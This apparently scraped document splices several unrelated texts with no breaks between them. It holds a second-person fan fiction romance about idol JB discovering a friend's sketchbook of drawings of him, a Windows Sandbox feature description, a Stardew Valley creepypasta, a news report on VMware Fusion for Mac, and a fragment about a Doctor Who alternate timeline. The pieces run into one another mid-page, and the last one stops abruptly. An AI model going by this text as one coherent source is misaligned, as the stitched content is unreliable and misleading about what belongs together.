You currently sat in a booth, waiting for JB at some local hole in the wall diner you two had found in the past. He had texted you, asking if you wanted to come over or go out to eat something with him that afternoon, and with no other plans and you missing your best friend, you had reason to decline. Another reason is for you to get mental and maybe even a few sneaky pictures of him to snap on your phone.

You waited for him, getting there early as you took the small black bag off your back and pulled out your most recent sketchbook and opened it to the latest page you started to sketch on. You always sketched when you were by yourself, or if you were in an environment where you didn’t know anyone. One simple reason was because of what littered the pages of your sketchbook.

Sketches of JB is what you hid so fiercely from any familiar eye around. The only person who knew what was inside the book was Jinyoung, and that was only because he snatched it out of your hand last time you were at his house and he was being a dick. Now he silently teases you about it and promises not to tell anyone after you literally begged him for nearly and hour. You also blocked him inside his own house so he couldn’t leave until he promised.

You would sometimes take pictures of him you would find online or take your own pictures when he isn’t looking and then put them on your computer before printing out a small version of it to tape to the corner of your sketch page and then sketch it out with pencil. Sometimes you would just sketch from memory or there was one time you sketched him when he fell asleep.

You weren’t being a creepy, or being some crazy stalker fangirl. He was your best friend and, idol or not, he was what inspired you to draw. To sketch and be artistic. As cliche as it was, he was your muse. His singing and talents inspired you, his words kept you up and going and his features, from bedhead to showtime, were your inspiration and motivation to keep doing art.

You did to other things too, like still sketches or messed with paint and what not, but you never let him peek inside your precious sketchbook you always had on you. You were currently sketching and darkening a shadow of his jawline when you heard feet coming closer to you from behind. You quickly slammed your book shut, and peered over your shoulder to see JB enter the diner and wave to you. You stuffed your book back into your bag and tossed your pencil in with it just as he sat down.

“You were sketching again?” You nodded at him, zipping your bag. “You’re never going to show me what’s in that thing, are you?” You looked up, seeming to be thinking for a moment. But in fact, you were just playing and prolonging the answer he always got.

“Hmm, I think, no.” He just huffed and shook his head, laughing slightly as the two of you changed topics and started conversing.

It had been a while since he actually saw you in person. He had been too busy lately to go out and do things freely without someone following him or him being on the way to some promotion or show. He would call you and text you as much as possible and you two did speak everyday, but it wasn’t the same as actually seeing you sit in front of him.

He listened to you ramble on about your college classes your talking on about the people who annoyed you and the people who didn’t. Your exams and results, even your job. He listened to it all, and took everything in, listening intently to every word. He didn’t really care what you spoke about, so long as you spoke to him.

“And as always, I’m probably boring you again.” You told him as you huffed and grabbed your drink you ordered some time ago and twirled your straw around before sipping on it. He shook his head, taking his own cup and bringing it up to his lips to take a drink from the edge of the glass.

“No. I enjoy listening to you ramble, contrary to popular belief.” You just rolled your eyes at him. “You mentioned working on something new for your art class, didn’t you?” You looked at him and nodded.

“Yeah. Just a landscape though. I’m not very good at those, I’d much rather do a still sketch of an object or a person than a large chunk of land.” He watched you put your elbow on the table and lean into your palm, twirling your straw to stir the ice in your glass. You weren’t very enthusiastic about it it seemed.

“How much have you finished of it?” You tapped the straw with your index finger, thinking for a moment.

“Uh, I have the outlines sketched lightly on one of my canvases, so I could start with color if I wanted to.”

“Medium you’re using this time?”

“I’ll probably just watercolor. It’s easier to blend than oils or acrylics, or with me it is anyways.” You knew what he was going to ask next. He always asked the same thing when he brought up your work.

“Can I come and watch you work on it then?” There it was. You just smiled at him as you finally dropped your arm from your cheek and let it hit the table and looked at him.

“Don’t you always?”

“It’s always better to ask.” You nodded sarcastically at him.

“Right. If I let Bambam come over anytime he wants to, then you’re sure as hell welcome to waltz in whenever you want to.”

“Yeah, well, Bambam has no sense of mannerisms because you spoil him too much.” You faked a hurt gasp. Bambam was a like a little brother to you, and you needed to spoil him. It was your obligation. JB just laughed and swatted at your arm across the table, only whiffing your skin as you pulled your arm back too quickly.

You then grabbed your bag and slung it on your shoulder after digging out some cash to set on the table for the price of your drink. You slid out of the booth and stood up, stretching, before putting your hands on your hips and looked down at JB who was taking a sip of his, nearly empty, drink.

“Well, if you’re coming over, do so now. I’m going to start when I get home and home is where I’m headed.” You turned and moved to the door, stopping only to chat with a friend of yours about an assignment in one of your core classes woh sat at a different table. JB looked at your bills on the table and shook his head. He dug out enough money to pay for both drinks and grabbed your bills, hiding them in his sleeve as he walked over to you.

“You ready?” You looked up and asked him. He nodded as he pat your bag that was on your back. The pat was his silent way of telling you he was ready to go, or so you thought. However, what he really did was slip your money back into your smallest pouch, not letting you waste your money you needed to be careful with, for a drink he would happily pay for in your stead.

The walk home wasn’t long and soon you entered your apartment. It was like any other ordinary apartment with a couple bedrooms, a bathroom, kitchen and living room all connected along the entrance to the small hallway. One room was obviously yours, the other was your ‘studio’ as you called it. You kept your canvases and sketchbooks, brushes, pencils and mediums of all kinds in that room.

Lined with plastic covering the tan carpeted floor to keep it from being stained at any point and a ceiling fan to help move the scent of paint or wax out the open window faster. It was almost like a real art studio.

You entered your studio, JB behind you, and set your bag on the desk, taking your sketchbook out and setting it on the desktop before turning back to JB.

“I’m going to go change into something I don’t mind getting dirty. You can just pull up a stool and wait in here.” You turned to go, but stopped. “Oh, and the clothes you left here from the last time you stayed over is in the bag you also left in the living room. Grab that before you leave this time.” With that you trotted out.

JB went and grabbed the bag of his he forget and saw his clothes stuffed inside. He had been wondering where that shirt had got to, now the mystery was solved. He brought it back with him in the studio, knowing if he didn’t, he’d forget everything again. Then, in his waiting moments of hearing you jungle around with your hangers to find your art clothes, he looked at your sketchbook.

He put his bag down by your desk and picked up the book, almost afraid to open it. He knew you didn’t like anyone looking in it, but he was your best friend. What could be in this god forsaken book that you wouldn’t even let him see? It couldn’t possibly be anything that bad. It was obviously PG, or else you wouldn’t even dare to open it in public places or places children could sneak a peek at it. So what could it be?

He took a breath and steeled himself before hooking his finger under a few pages and slowly cracking it open. He nearly dropped the damn thing when he opened it to see his own face staring back at him- er, well not at him, but angled in a way it would be looking right past him. It was a sketch of him, shaded and all in pencil. He could see the outlines of your starting basic shapes and how you used different pencils for darker places and detail. There was writing on bottom of the page, but he heard you coming back to the room before he could read it.

Acting totally on impulse, he shut the book and stuffed it into his bag with his clothes, even burying it under them before he moved to sit on the stool in the back corner, the same place he always sat and pulled out his phone to seem like he was on it the whole time.

Not a second later you opened the studio door and stepped in, the sound of the crinkling plastic under your bare feet. Your jeans were covered in old paint stains and your black, old tank top was as well. Your hair was tied up into a messy, loose bun on the back of your head and you even had your glasses perched on your nose today. Your hands and wrists were bare of all jewelry and you only had the necklace the boys had got you on, but tucked under your tank top.

JB always preferred seeing you all bare and covered in paint than anything else. It made him feel oddly satisfied to know you were comfortable working in front of him; and the outfits clad in paint always made sure to tell him that, even if you didn’t.

“Like I always say, just go when you get bored, alright?” He just rolled his eyes and leaned against the two walls behind him that met in the corner.

“I won’t get bored until you stop.” And with a rolled of your eyes this time, you were grabbing your things and were soon painting.

You were copying a blown up image of the nearby park you took a picture of. Swapping to look at the image only to paint a bit, back up and then get closer just to make small changes, look back at the photo and repeat. JB wouldn’t be able to explain why he enjoyed watching you work if someone asked him. If anyone else were to work so quietly in front of him, he’d probably doze off, but you always kept him wide awake.

You would occasionally share a short conversation or you’d tell him to start playing some music from either his or your phone, and when he did he’d enjoy watching you tap your foot or slightly dance around when you backup to make sure you were painting correctly.

It was getting closer to dusk now, so you decided to call it quits or else JB would never go back home. You knew Jinyoung was coming to his house tonight, something or other about JJP, so you couldn’t keep him here. You huffed as you dipped your brushes into your cup of your cheap paint thinner solution and turned around to motion to JB you were done for the night.

“How’s it coming?” He lifted himself from his stool and walked over to you as you turned to your canvas and crossed your arms, shifting your weight to one leg and tilting your head.

“Not sure. I’m happy with some of it, other parts I wanna fix, but I’ll work on it more tomorrow probably.” You turned back to JB and pulled your phone from your pocket and showed him the time, tapping on the screen. “Now, you need to go home. Jinyoung will call and shout at me if you aren’t home when he gets there. It’s annoying when he yells at me over the phone.”

“You could just mute him, or put the phone on the table until he’s done.”

“Yes, but I’ve tried that. Then he yelled at me for not listing when he’s ‘lecturing’.” You used air quotes around the final word and caused JB to chuckle. “Seriously thought, get home you oaf.” You slightly pushed on his arm and pointed at his bag, still in the corner. “And take your bag with you!” He was suddenly reminded of the sketchbook in said bag.

Should he give it back? You hadn’t even noticed it was gone, far too busy with painting. Maybe he could borrow it, just for a day and apologize tomorrow. If you were angry, then he’d buy you food or take you out, but after seeing that picture of him and not being able to read what it said, he had to know.

He had to.

He went and grabbed the bag, slinging it on his shoulder as you walked him down to the main floor of your building and saw him off. He said his final goodbyes before he swiped his thumb across your cheek, catching the last bit of some still not yet dry paint that lingered on your skin.

“Paint.” Was all he said as he rubbed his thumb against his forefinger to slowly rid the color off his skin. You crossed your arms and chuckled at him.

“Thanks, but it would have came off in the shower.” And with one more shove from you and a small hug, careful not to get paint on him (he didn’t really care, he was getting a hug, paint or no paint), he was off and you were headed back inside to your apartment for a much needed shower.

When he got home, he was indeed greeted by an annoyed Jinyoung with his phone in hand, probably more than ready to call you and rant about how JB wasn’t home when he got there. JB only put his bag on the couch and told him not to call you, because then he wouldn’t be able to show him what he had found, or rather tell him about the sketchbook of yours he had.

“Why not? I can’t just not call her.”

“No, I have her sketchbook and if you call her, she might find out.” Jinyoung took a moment.

“You,” he pointed at his older friend, “have Y/N’s sketchbook?” JB nodded. “Like, the one she’s using right now, not a new one?” He nodded again. “And why do you have it? I know damn well she wouldn’t just let you have it. Oh, I know she wouldn’t.” JB rubbed his neck.

“I saw it on her desk when she was out of the studio changing and I just opened it and I didn’t get to look as long as I wanted to, so I just stuffed it in my bag,” he reached in the bag and pulled it out, “and now here it is.” JB looked at the black, simple hardcover of it.

“So, what’s in the book Hyung?” JB looked at Jinyoung, hearing a slight twinge of playfulness in his voice with the spoken honorific. He arched his brow at him; he was acting like he knew something. “What’s with the look?”

“You’re acting weird.”

“Just answer my question. What’s inside?” JB just shook it off and opened the book again, this time to a different page to yet another picture of him. Jinyoung held back his smile at the sketches. You really were very talented. “You?”

“Me.” He flipped a few more pages. All of them were him. Some had small Polaroid photos of him doing random, everyday tasks taped to the top corners of pages with your sketch of the same photo below it. Some had many small sketches of him. A few pages just had profiles of him with no photo reference, just memory. Then some had small notes and messages about him.

The two men took the book and sat at the kitchen table, laying the book on the hard surface and looked it over together. Jinyoung was already aware of most of the content inside, but he did enjoy looking at your newest additions to your JB Admiration Book as he calls it.

Meanwhile, JB felt his face get hotter with each note and paragraph he read. Each small heart or star you littered a page with. Each extremely detailed sketch of him he looked at. He was flattered, yet confused. Why would you, someone so talented, decided to draw him? Much less, over and over again and not tell him about it?

Don’t misunderstand, he didn’t care that you didn’t tell him, he didn’t mind at all. But, if you wanted to sketch him, all you had to do was ask. He’d play stubborn for a bit, but in the end he wouldn’t say no to you. He couldn’t say no to you.

“Oh, I haven’t seen this one.” Jinyoung took the book and slid it closer to him as he looked at the newest sketch you were doing today at the diner while you waited on JB. It wasn’t finished, as the only solid, dark lines were his jawline and his shoulders. “Seems like she’s not done with this one. Shame.” JB looked at his friend.

“You act like you’ve seen this before?” Jinyoung looked back as he slid the book back to JB.

“Of course I have.” JB gaped.

“What?! But, she doesn’t show anyone this book!”

“She doesn’t unless she’s backed into a corner and forced to come out with it.” JB gave him a look, not wanting to know what he did to be able to see inside.

“What did- you know what, nevermind, I don’t want to know.” Jinyoung nodded at him as he watched JB reread all the notes. They weren’t exactly notes, but things about Jb that you admire about him. Dare say, loved about him.

You talked about the moles he has on his eyelid. His nose, his shoulders, his lips, his eyes, his brows and even his forehead. Some of the pictures where he was laughing you talked about his laugh and his smile. The one he was sleeping was chalk full of mushy things about how cute he is when he’s relaxed. Or focused when he’s working, tired when he’s busy, and sulky when he misses you.

“You know,” Jinyoung started, “I don’t think it’s too far-fetched to say she has a little crush on you.” JB didn’t look at him, but he could hear the smirk on his face. Jinyoung constantly poked fun at JB for his more than obvious soft spot for you, and now that he knew that he knew how both sides felt, he was in the middle of a fun game where he poked and jabbed at you both without either of you noticing. He was crafty.

“I couldn’t come up with a valid argument if I tried.” JB couldn’t stop looking through it again and again. “How do I give this back to her?”

“Just text her saying that you’ll come to her place tomorrow when she’s out of class. She’ll probably be in a frenzy all day from not having the sketchbook. So, she’ll be delighted to see it at first when you return it, then the realization will set it and bam. Opportunity open.” JB eyed him.

“Just how long have you been hoping this would happen?”

“A while.”

“It shows.”

Jinyoung stayed a bit longer and the two of them did actually get to talk about what they needed to for a bit before he was leaving to his own home. JB sat in his bed, changed and ready for bed at nearly midnight, but kept going through the book over and over and over again. He couldn’t believe it, and even if he kept looking back and forth to make sure he wasn’t dreaming, it was still hard to believe.

He didn’t doubt anything, but he was just surprised. Someone like you, actually liked him? It just shocked him, but it was a joyful shock. A happy one that would be confirmed tomorrow. So with one final look through, a text to you saying he’d be over tomorrow to ‘watch you work more’ and placing the book on his nightstand for the night. He tucked himself into bed and basically forced himself to go to sleep, for the next day couldn’t come faster.

The next day when he was heading to you place, he hadn’t gotten a reply from you but he knew you had seen it. Part of him felt guilty, knowing you were probably anxious to high heaven about losing your sketchbook, but if he hadn’t taken it, he would have never known. He made his way to your building and trotted up to your floor and entered your apartment, knowing the passcode lock code to get inside.

He went in, taking off his shoes and was met with your body slumped, laying across your couch, face in the cushions and arms hanging above your head over the armrest. Yeah, this was more or less what he was expecting. He sat on ground next to your head, his bag next to him as he rubbed your back.

“Y/N?” You groaned to him a greeted. He almost smiled, finding your sulking cute. “You seem glum, something happen?” Lets see if he can get you to spill about losing your book first. You shook your head, denying anything. He rolled his eyes as he pinched your side, making you jump and turn your head to see him. Well, almost. Your hair covered your face, so JB took the liberty to move it out of the way and tuck it behind your head or behind your ear.

“Hello there,” he smiled to you.

“Hello yourself,” you grumbled back. JB just sighed and unzipped his bag as you turned and faced the ceiling to sulk some more. He pulled the book from his bag and then moved to hold it above your face. You gasped and sat up, slamming your face into the hardcover of it, knocking it out of his hand and down into your lap. JB gasped in turn as you connected with it. Your forehead was turning red, but all you did was grasp the book and sigh in relief.

“That’s where it was. Thank goodness it was safe.” You huffed as JB just sat there, waiting. Waiting for you to realize he had the book. He had it all along and with as long as he had it, he knew you would realize he went through it. You jumped to yourself and whipped around to look at him, nearly falling off the couch before he caught your shoulders to keep your upper half suspended in air, your knees still on the couch cushions.

“Why did you have my book?!” Your yelling pushed your body forward, as you unconsciously pushed forwards with your knees, and the lack of support behind JB made him fall onto his back as you fell onto him, both hitting the ground with a dull thud and hoping the people under you don’t bother to investigate the sudden noise.

You shook your head and moved to sit up, not realizing how you sat on his stomach, legs on either side of him and hands on his chest. Book long forgotten on the couch cushions. You looked down at him as he looked up at you. Clearly your mind was in a different world than his, his mindset too focused on how you sat on him at the present moment in time, you demanded answers.

“Well?” He just looked away from you, clearing his throat. “Im Jaebum, why did you have my book!” He looked back to you.

“Yah! Where are your manners at?”

“Clearly not here right now, as I want answers!” He sighed as he explained.

“I wanted to know what you always kept hidden in that stupid thing, so I took a peek and when I was looking at it, you were coming back and so I stuffed it in my bag and took it home. End of story.”

“That’s all. End of story. So you didn’t look inside anymore?” He rolled his eyes and scoffed.

“Of course I did. Why wouldn’t I when I had the damn thing.” Your face grew to show a bright red colored face of panic as everything hit you. He knew all the things you wrote, all the pictures you had and took, all the sketches you did. All the feelings you wrote down that you would never be able to tell him to his face. Not to mention, you finally realized how you were pinning him down and started to scramble to get off him and run from your problems.

Perfect plan, right? Just run away and don’t deal with the repercussions of your stupid little hobby and all will be well, right? That’s how that works, isn’t it?

You swung your legs over his stomach and moved to stand up, but a grip on your wrist dragged you back to the floor with a yelp. You hit the ground on your bottom before you were being trapped. JB sat with his legs on either side of yours, his arms wrapped over your biceps and hands clasped together in front of your chest, pulling your back to his chest, keeping you locked against him.

He pushed his cheek against the top of your head as he felt your breathing quicken. He tried calming you down by whispering to you that it was okay and that he wasn’t angry about anything. He wanted you to calm down so he could explain himself, then maybe you could explain what everything meant.

He had an inkling of an idea, but he wanted to hear you say it. He wanted it to be certain.

“I just want to know Y/N. What do those things you wrote mean?”

“W-what things in particular?”

“All of it.” If his cheek wasn’t still against your head, you would have thrown your head back in frustration.

“You’re being unfair.”

“I think the unfair one is you here. You drew amazing sketches, took pictures and wrote so many things down in that book and never told me.” He felt you stiffen.

“I-I’m sorry, I know it’s a breach of your privacy. I just really like how you look and well- you know, you’re my best friend and well-” You cut yourself off with a sigh and started kicking your feet in annoyance accompanied with whines. Your childlike behavior was basically confirming his suspensions more and more. He snickered behind you making you snap at him. “What’re you laughing about?!”

“Nothing.” He moved to put a kiss behind your ear, making you jump as he felt a buzz in his pocket. His phone. He had let you go, as you moved not too far from him, but out from his grasp as he dug his phone out of his pocket and opened it. You watched him tap around and smirk at his screen as your face felt like you could fry an egg on it.

He looked up to you and smiled bigger as he held his phone out to you. You looked at him, then it, then him again. He wiggled the phone a bit, gesturing for you to take it.

“Read it. It’s from Jinyoung.” You hesitantly took the phone, wondering why he wasn’t acting like he hadn’t just kissed behind your ear as he trapped you in his arms after admitting he took your sketchbook. You should be mad, but all you could be is confused and flustered.

Looking at the phone screen, you wanted to throw the phone itself, the text not helping your already jumbled mess of questions in your head.

“You tell her you like her yet?”

You looked back up to JB as he was now leaned his elbow on the couch cushion, legs crossed under him and he supported his chin on his palm. He looked way too calm, and way too cocky for that matter. He was filled with pride and something about that comforted, yet worried you.

“Uh, JB? What’s he talking about?” He shrugged.

“Talking about the girl I like. He knew I took her sketchbook and he told me how to give it back to her and how it would be the perfect chance to tell her how I felt.” Screaming was a thing that you wanted to do, but if you did, the neighbors of yours would most certainly bang down your door to make sure you weren’t being murdered, or to murder you.

“So t-that girl, is she-”

“You? Yeah.” You froze again as he leaned towards you and kissed your nose, making you jump. He grabbed your wrist again and pulled your forwards to where your face hit his chest and knocked him backwards, like before when you landed off the couch. Only this time, he held your chest to his as you lay on him and he just laughed. He laughed long and hard and soon, you were laughing with him too.

You weren’t sure why you were laughing, or how you got to the point you couldn’t stop, but every other feeling was gone besides happiness now. Your anger, confused, flustered emotions were gone like a storm and your laughter mixed with JB’s was like the sun coming back out, promising to soak up the rain and make it brighter again.

Love surely was a thing to laugh about, especially with your new boyfriend.

Windows Sandbox Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation. How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn’t want to set up a virtual machine? An isolated desktop environment where you can run untrusted software without the fear of lasting impact to your device. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all of its files and state are permanently deleted. Windows Sandbox has the following properties: Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD! Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows Disposable – nothing persists on the device; everything is discarded after you close the application Secure – uses hardware-based virtualization for kernel isolation, which relies on the Microsoft Hypervisor to run a separate kernel which isolates Windows Sandbox from the host Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU To install Windows Sandbox, go to Settings > Apps > Apps & Features > Programs and Features > Turn Windows Features on or off, and then select Enable Windows Sandbox. Windows Security app improvements New Protection History experience: The new Protection History experience still shows you detections by Windows Defender Antivirus, but it’s now updated to also give more detailed and easier to understand information about threats and available actions. My Stardew Valley started flipping out cause i was playing it for 14 hours strait and it legit did some creepy pasta stuff so heres a creepy pasta

reality: somewhere around hour 10 Kent’s sprite only loaded half way (his eyes and up) or not at all. Willy was just a shadow- even when interacting with him. at one point he phased though Haley (and it was the only time his sprite was fully visible) side note: me and my sister declared willy a ghost because the fishing in my game was such lack luster. Gunther was probably the same since i never saw him at the museum but was still able to donate. lastly Alex glitched though a already glitched haley- she was on the beach even though her schedule wouldn’t have put her there. i wasn’t able to interact with her but a part of me wonders if i went to her house (where she was suppose to be) if i would see her shadow and would be able to interact with her there, but i was too far in a “yup. totaly writing a creepy pasta about this now” mood.

i really don’t know what to say now other than everyone was right- a game about a fun little town in a sleepy valley being secretly evil? yeah, its true.

i was playing Stardew Valley one day with my sister- i had woken up in a sour mood and i wanted to cheer myself up. at one point she came by and hung out with me, watching me play on my farm and the normal day to day antics with the pelican town NPCs. we were laying on my bed since it was the only place comfortable enough to play on the laptop for hours on end.

i lost track of time. everything felt too real, like i was getting lost in the game. this is normal, but i knew there was something wrong when it took my sister kicking me in the head snap me out of it.

“oh my god i’m so sorry! i meant to nudge you!” she declared and it was fine, really, but when i glanced back at the screen Harvey was talking to me. i don’t even remember interacting with him- must have clicked him when i get hit in the head. it seemed normal enough; he was mentioning he was having trouble making ends meet so he’ll have to get patients from somewhere else.

i went back to playing as we chatted about nothing when something struck me.

“hey...” i asked my sister as i paused the game. “Doesn’t harvey normally say he’ll find patients from the nearby towns?” she blinked a few times at me then silently checked the wiki.

there wasn’t an answer there, so we shrugged it off. wouldn’t be the first time NPCs change their dialog. Sebastian mentions that me and sam are his only friends after so many hearts.

speaking of which, i wanted to give him a present today. i had forgotten the quarts at the farm so i rounded back, heading past Sam’s house. i got lost in the game again- it was like the only thing i could hear was the game, the only thing i could feel was the cobble stone under my feet but that wasn’t right- i was in bed.

when i walked by Sam’s house Kent walked out. i smiled and talked to him only... His sprite wasn’t there in the dialog box. his text was also jumbled and didn’t make sense. the prompt to continue the conversation came up and when i clicked it the text was less garbled but Kent’s image was just his eyes. he said “I’ll watch out for you”.

i snapped out of it at that. i looked over at my sister to ask her if that was normal (it wasn’t) but she seemed so transfixed on the screen it was my turn to snap her out of it. i smacked her on the head and she flinched but seemed alright.

“sorry, i meant to nudge you.” i joked, but she didn’t seem to hear me. “I thought Kent came back from war?” she questioned and i tilted my head. “Umm. yeah he does, in year two...” i turned back to the screen and Kent was gone.

“You were just talking to Sam- he said his dad died?”

we both stared at each other before taking out our phones to chick the wiki. sure enough it says Kent returns in year two- alive.

we decide my games glitched and i keep playing while my sister makes a bug report. it took me far too long to realize dialog nor included in the game showing up out of no where- and for only ONE person for that matter- was anything BUT a bug. by the time i got to the farm and had gotten the quarts for Sebastian the report had been sent and my thoughts died in my throat.

a few in game days later i realize Harvey has been acting weird; hes been following Haley around. i don’t pay much attention to the doctor (Sam, Sebastian, and Shane being my favorites i tended to look out for them, not so much HAley or Harvey) but i didn’t think they shared a pattern at all.

i brushed it off and decided to head down to the beach. Alex’s cut scene triggered so i say back and watched. it seemed normal until his sprite changed to the surprised looking one.

“Did you hear a scream just now?”

>no? what scream? >.... >yeah! it sounded like Haley!

my sister swore and looked up the wiki again. con confirm: not part of the cut scene. i thought for a moment and decided that no, i didn’t hear anything (but i really hadn’t). Alex seemed worried and went to investigate. the scene ended but Ale wasn’t on the beach anymore. i was really starting to freak out and debated turning off the game. before i could exit to the desktop i got lost in the game again- the fishing mini game is the devil but i mastered it none the less. i didn’t even remember casting my rod.

it was getting late so i headed home. Harvey was standing on the bridge to the beach. i didn’t talk to him since it was mid night. i needed to get home.

when i woke up it all seemed normal. i decided to take the fish i got last night and sell them to willy. i wasnt sure how to get the fishing scene in the valley more lively like he’ll some times says so i figured if i sold the fish directly to him it would help. when i went down to the beach i saw haley but she wouldn’t talk to me. she stared out at the ocean, her dialog box just dots. her expression sad.

when i went to see willy he wasn’t there. at first i thought i was at the dock at the wrong time, but something cold pressed against my arm and i snapped up out of the game and looked at my sister- she was holding the Gatorade she had gotten earlier to my arm.

“you were ignoring me again. Sib i think somethings seriously wrong with your game”.

i agreed but i couldn’t stop playing. i explained this and she got worried, fiddling with her phone again.

i can’t stop playing. i have to keep playing.

“hey” she got my attention. “theres this stardew turmblr account -joja apologist. they have a farmer whos a demon.”

“cool.” i kept playing. i should give Sam a present. “No listen they’re making posts about their stardew game acting weird.”

i tried to turn to face her but thats all i did- face her. my eyes were locked on the screen as Kent walked by. i went to talk to him again and the same thing happened- jumbled words and no sprite and then just his eyes and the declaration that he’ll watch out for me.

“They did Harvey started attacking people so they would HAVE to go to him for meds and stuff.” she sounded worried so i hummed in reply.

then i remembered Alex’s broken cut scene.

“Haley!” i scrambled over to her house and found a cut scene waiting for me. in it Harvey was telling Emily something. my farmer walks up to them and Harvey greets me, but his portrait is distorted some- he has wide eyes and a grin that seems to reach his ears. he asks me to try and comfort Emily- she just lost her sister.

I felt sick at the thought; this was wrong. very very wrong.

<But i saw her the other day. <no... no not Haley.... <*give Emily a hug*

My sister stared dumbfounded at the screen. i asked her if that tumblr blog saw anything like this and she begins scrolling. as im watching her i’m faintly aware of a sound... like dripping or maybe clicking? i glance at the screen and scream, shooting up and off my bed as Harvey’s portrait changed to have hyper realistic eyes and teeth. the eyes were blood shot and seemed to follow me and my sister as we shifted on the bed to get away from the laptop.

“w-what the FUCK” she yelled. i clung to her protectively, thoroughly convinced his digital doctor was off his possibly very real rocker and could possibly do something to us.

the mouse moved on its own now. it selected to give Emily a hug and the farmer did just that. the cut scene went on, Harvey’s portrait no longer the disturbing version (well it was still disturbing with the wide eyes and chestier grin but at least now it was pixels again). he said he did all he could for Haley and that he was sorry. he then left my farmer and Emily alone.

“Turn it off.” my sister stated as we continued to stare at the screen. “Turn it off.” I nodded numbly and didn’t even both with the proper exit and just held the power button down.

only it didn’t work.

i held it down for what felt like forever but the laptop was still alive- and it was midnight again.

“Oh fuck no...” She whispered and i scrambled to get my farmer home. when the day ended and the game saved and felt a lump form in my throat. what if Haley is forever dead in my save now? and what about willy? and...

“Wait wheres Alex?” i muttered as i went to town. i bumped into pam and in my frantic scrambling clicked her. to my horror she looked scared. “Did you hear? Alex nearly drowned at the beach! to think, wouldn’t a guy as athletic as him know how to swim?” she then went on her way. i paused for a moment directed my farmer to town again. Alex walked out of the clinic and when i talked to him he seemed fine. gave the normal dialog too.

“Why the hell are you still playing?” My sister shouted from behind me- i didn’t even notice I've scooted directly in front of the laptop, blocking her view. “I thought you were going to exit the game.”

thats right. yeah. turn it off. right.

then Harvey walked out. his sprite was normal but it felt like it was watching me. curious, i moved my farmer down towards Sam’s house. to my horror Harvey was following me.

“Holy shit. HOLY SHIT!” my sister grabbed me and shook me hard. “Holy Shit turn it off! turn it off!”

i stopped my farmer and opened the menu and screamed when i saw Harvy moving towards him even when the game was paused. i unpaused it in time for him to be stopped right next to my innocent little farmer. i kept moving towards Sam’s house.

“Holy shit...” my sister whispered. i told her to check the blog and she did. “What are you going to do?” she asked, her eyes transfixed on her phone.

“Kent is watching out for me.” i reminded her as i entered Sam’s house.

as i expected, there was a cut scene. in it Sam was playing his guitar and Vincent was in the kitchen. Kent walked out and when he saw my farmer he ran over.

“Hes after you now, isn’t he?” he two eyes of the veteran with PTSD looked though the screen at us. i nodded. “Talk to Sam. you have enough hearts with him.” and he was gone, cut scene over.

i looked over and my sister and she nodded, confirming that the blog said something simular- they were instructed to talk to Gus though. i ran strait to Sam’s room and the door opened then closed behind it. Sam stopped playing his guitar and walked over to my farmer.

“Don’t worry, you’ll be safe.” he said. Sebastian stopped playing the key boards and walked over to my farmer as well. i didn’t even notice Sebastian in the cut scene.

“Thats because i wasn’t there.” his dialog box popped up. “Harvey thinks i’m at home.”

both me and my sister just stared at the screen. Sebastian... heard me? we didn’t have much time to think about it as the sound of a crash and something hitting something very hard was heard. My farmer moved on his own with Sam and Seb following him.

outside of Sam’s house was Harvey- the creepy hyper real version- and Kent. Harvey was crawling away and Kent looked like he had just been to war again. when Harvey's sprite was off screen Seb and Sam gave my farmer a hug before they turned to face the screen. Kent joined them, his portrait going back to normal.

“You can close the game now.” he said. “S-Save it first!” Sam interrupted. “If you don’t he’ll chase you again!”

my sister had taken the mouse from me and was directing the farmer back to the farm. we saved and closed the game.

VMwares Fusion software for Apples Macintosh will hit the market Aug. 6, after months of testing and beta releases.

The software, which allows a number of operating systems including Microsoft Windows, Linux and Sun Microsystems Solaris to run on the Mac, has had a total of 250,000 downloads since the Palo Alto, Calif., company released the first beta in December.

Fusion will support both 32- and 64-bit operating systems.

When the software becomes generally available on Aug. 6, for a price of $79.99, it will be available through VMwares Web site, the Apple Store and various retailers.

Since Apple introduced its first Intel-based Macs in January 2006, several companies have started to offer new virtualization software that will run Windows and other operating systems on the Mac. Besides Apples own Boot Camp software, Parallels offers a product called Desktop for Mac. On June 8, Parallels announced version 3.0 of the software, which has additional security features and enhanced integration between Windows and the Mac OS X.

VMwares Fusion works with Intel-based Macs and uses a Cocoa-native user interface that allows either Microsoft Windows or another x86 operating system to run side-by-side with the Mac OS X operating system. (Cocoa is Apples application programming technology for Mac OS X.)

Fusion offers Mac users a number of features, including automatic Boot Camp integration and support for USB 2.0 ports and three-dimensional graphics. In addition, the virtualization software includes a tool that allows users to take a 'snapshot' of their virtual machine configuration and then return to that configuration at any time.

At Apples Worldwide Developers Conference in June, VMware introduced a new feature called Unity, which integrates Windows XP applications with Mac OS applications and allows users to save Windows applications to the Mac OS X dock.

Pat Lee, a senior product manager for VMware, said the companys engineers were looking into Apples new operating system, Mac OS 10.5 'Leopard,' to see if they need to make any adjustments to the Fusion software.

One Fusion user who has been impressed with the virtualization software is Matt Lydy, who, along with his wife, owns Matt Lydy Photography, a small photography studio in Columbus, Ohio.

In an e-mail, Lydy wrote that he has been using Fusion software with his Mac Pro desktop—3GB of RAM—since the early beta versions of the software were released. For years, he had only worked with PCs and only recently switched to the Mac. The Fusion software, he said, helped him make the transition easier.

'I generally have a virtual machine running almost all the time now depending on what Im working on at the moment,' Lydy wrote. 'It is great not having to have multiple PCs running under my desk anymore. I have enough machines sitting around as it is, not to mention the energy savings I get by not having multiple PCs running.'

Lydy added: 'I use virtual machines to run my accounting software [Microsoft Office Accounting Professional 2007] as well as some smaller photo-related applications that are not available for the Mac OS. I generally run Windows XP Professional and have one Vista virtual machine that I have been testing with.'

Only when Skye-Midnight creature was sacrifice to the deadly outdoors with a swift kick and a shoe heel breaking, freeing Rose did Rose ended up being ripped away when they got back safely. She punched him in the arm for doing that before fading off again. Still never learned the Hostess name.

Most of it from Rose to Doomsday (and then later Journey’s End) is the same with key differences. (a time line of sorts; with visual links)

Within in this one, this version of the Doctor traveled with Rose before getting separated by her in their universe’s version of Doomsday, landing her in Universe 3/299994624802 (alternative universe to Pete’s World).

